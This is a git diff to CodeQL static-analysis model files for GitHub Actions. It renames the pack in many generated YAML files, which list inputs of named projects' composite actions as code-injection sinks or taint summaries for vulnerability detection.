@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 9c5c38007bc3..7909d6177768 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 8899c0563e8e..c62ee58c4402 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index f71c818a337e..37efd3a4d40b 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 989eca719606..0a84e79d0243 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 2666233ac877..a026f0529340 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index e8aa6be8fa6a..9b199fb5973c 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 9bd167413532..13ae8d0f718e 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 3c50e297eb5e..04775e835715 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index d1c181a87075..b0b5918d13fe 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 5b600a4cad42..9879b7e44517 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 65fdcb11a008..e38a5edef48f 100644 
--- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index 08c3ff9cf438..4fa53f367e41 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index c06978549fb9..f3fa29375459 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index eaca3fb9c62b..c66fab9d129b 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index e1c608d3e105..f7e76b691130 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index dc1f7a7b3b88..a216abf29acb 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index a80ce46abc59..396841a6c168 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 15886c2c945d..1a3f383d23b3 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 45769a727d8b..98755665d860 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 9f85415a4825..5849fe5c34f9 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bbfb20551afc..fdc8478bef74 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index f8dc63ee029e..72b9c1c870ef 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index 5ad65dcc0bdb..b8688ab86d29 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 90b6b38b6b01..e2aacd8f10b8 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 4f1157d862ae..13f28980e573 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index b8ded477dd2f..ee1ef52ecd12 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 87ae2f5d614f..14e60d9cc19b 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 0cfd7be68a34..0516493f6bab 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 54a05620d902..62e64b63b44a 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index e16f3fc74b3f..e132ef1cee39 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index a3f692e7d2f3..90d50a1b757a 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 5acd7348464c..a8b9c41363ea 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 365dd90b1206..75652ed69f99 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index 0d7a06175a59..973007c5490c 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 4c831ca673af..35a1a09df590 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 40b5f413d661..6b193462780f 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 565bd119df75..448f657d97ec 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 31157d853d0e..009f4f1ef08e 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 6208b63b89a9..bcb882872150 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 1073ddd49c18..8476c40ceaf2 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 2b71886a286a..462489a4c512 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 547bcca2ec97..56b354c870e0 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index e8ed66af89af..9fbb4108868d 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index af1327f7d7fa..5fc85d3530e9 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 887743c2c703..b0b36e7bd36c 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index ff7e51e477ab..cb2c50f440c0 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 55d0ddfba225..7ac5c21a6138 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d4c0823c2ece..1276334381da 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 7d789ec3ccca..0fc27163dd09 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 2aa6633d752e..ae994dbad1ae 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 536e6d914a25..6930bfed43fd 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 45bfb025ac99..94a802aa36f4 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index bba69dfc7a0e..04246517883e 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file 
